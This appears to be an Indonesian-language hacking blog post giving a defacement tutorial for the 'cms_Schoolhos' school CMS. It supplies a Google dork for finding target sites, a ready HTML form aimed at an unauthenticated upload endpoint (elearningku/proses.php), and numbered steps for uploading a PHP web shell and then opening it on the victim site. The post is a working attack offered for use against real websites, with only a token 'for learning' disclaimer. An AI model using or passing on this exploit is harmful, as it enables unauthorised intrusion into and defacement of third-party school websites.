CSRF cms_Schoolhos
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface CSRF cms_Schoolhos
- Dork :Pada kali ini saya akan memberikan Tutorial Deface CSRF cms_Schoolhos
Sebelum itu kita harus mempersiapkan sesuatu
inurl:/?p=berita ( Kembangkan dorknya )
-CSRF :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tatsumi Crew</title>
</head>
<body>
<form method="POST" action="site.com/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
<input type="file" name="fupload">
<input type="submit" class="tombol" value="Upload">
</form>
</body>
</html>
Note: Yang warna merah ganti menjadi site target kalian.Langusung saja :
1. Dorking dulu di google ( Berdoa saja semoga dapat yang vuln )
2. Jika sudah masukkan exploitnya seperti ini
contoh
site.com/[PATCH]/elearningku/proses.php
Jika ada blank atau putih berarti vuln selanjutnya
3. Masukkan link beserta exploit tadi ke dalam CSRF
4. Dan save CSRF dengan format .html
contoh : CSRF.html
5. Buka CSRF tersebut menggunakan browser kalian
6. Upload shell kalian
7. Akses shell ?!
site.com/file/materi/namashell.php
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb